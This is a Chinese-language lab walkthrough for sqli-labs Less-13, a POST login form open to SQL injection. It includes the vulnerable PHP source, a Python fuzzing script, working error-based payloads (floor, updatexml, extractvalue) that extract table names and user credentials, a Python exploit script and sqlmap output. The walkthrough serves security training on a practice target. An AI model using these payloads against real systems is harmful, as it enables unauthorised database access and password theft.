sqli-lab-less13
一、靶标地址
Less-13 POST-Double Injection- Single Quotes-string -with twist
#字符型带单引号括号的双注入
http://127.0.0.1/sqli/less-13/
二、漏洞探测
输入admin admin
得到post数据包
uname=admin&passwd=admin&submit=Submit
#无任何回显
猜测业务逻辑流程应该是根据输入的username、password去查询然后进行比对
uname=1')&passwd=2&submit=Submit
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and password=('2') LIMIT 0,1' at line 1
猜测语句为 ') and password=('2') LIMIT 0,1
推测语句为select username,password from users where username= ('$uname') and password=('$passwd') limit 0,1;
fuzz.txt
'
"
')
")
'))
"))
#使用python脚本进行fuzz
import requests
url="http://192.168.128.159/sqli/less-13/index.php"
#F12查看或者burpsuite抓包
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36','Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
file = open("./fuzz-13.txt","r")
payloads = file.read().splitlines()
for i in range(len(payloads)):
print("==============This is "+ str(i) + payloads[i]+"==============")
subpayload = "1" + payloads[i]
payload = {
"uname" : subpayload,
"passwd" : "1"
}
response=requests.post(url,headers=header,data=payload)
print(response.text)
三、源码分析
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;#查询成功无任何回显
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
//echo "<br>";
//echo 'Your Password:' .$row['password'];
//echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());#有报错回显
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
四、黑盒与白盒测试
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
print_r(mysql_error());#有报错回显
1、floor()函数报错
#获取数据库 用户 版本号
uname=1') union select 1 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a #&passwd=1&submit=Submit
#获取表名
uname=1') union select 1 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd=1&submit=Submit
#获取列名
uname=1') union select 1 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd=1&submit=Submit
#获取用户名
uname=1') union select 1 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a #&passwd=1&submit=Submit
2、updatexml()函数报错
#获取数据库名
uname=1') and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) # &passwd=1&submit=Submit
#获取表名
uname=1') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) #&passwd=1&submit=Submit
#获取列名
uname=1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) #&passwd=1&submit=Submit
#获取列字段
uname=1') and updatexml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),0) #&passwd=1&submit=Submit
uname=1') and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) #&passwd=1&submit=Submit
3、extractvalue()函数报错
uname=1') union &passwd=1&submit=Submit
#获取当期数据库名
uname=1') union select 1,2,extractvalue(1,concat(0x7e,(select database()))) #&passwd=1&submit=Submit
#获取表名
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #&passwd=1&submit=Submit
#获取列名
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) #&passwd=1&submit=Submit
#获取列字段
uname=1') and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e)) #&passwd=1&submit=Submit
uname=1') and extractvalue(1,concat(0x7e,(select password from security.users limit 0,1),0x7e)) #&passwd=1&submit=Submit
五、脚本撰写
import requests
url="http://192.168.128.159/sqli/less-13/index.php"
#F12查看或者burpsuite抓包
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36','Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload = {
"uname" : "1') union select 1 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a #",
"passwd" : "admin"
}
response=requests.post(url,headers=header,data=payload)
print(response.text)
六、sqlmap
sqlmap -u "http://192.168.128.159/sqli/Less-13/" --data "uname=1&passwd=1&submit=Submit" --batch
Parameter: uname (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=1') AND (SELECT 2518 FROM(SELECT COUNT(*),CONCAT(0x71716a6a71,(SELECT (ELT(2518=2518,1))),0x7170706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Sahm&passwd=11&submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=1') AND (SELECT 8260 FROM (SELECT(SLEEP(5)))rllL)-- nwQS&passwd=11&submit=Submit
七、总结
1、最好使用group_concat函数保证一次性输出,减少payload
2、报错回显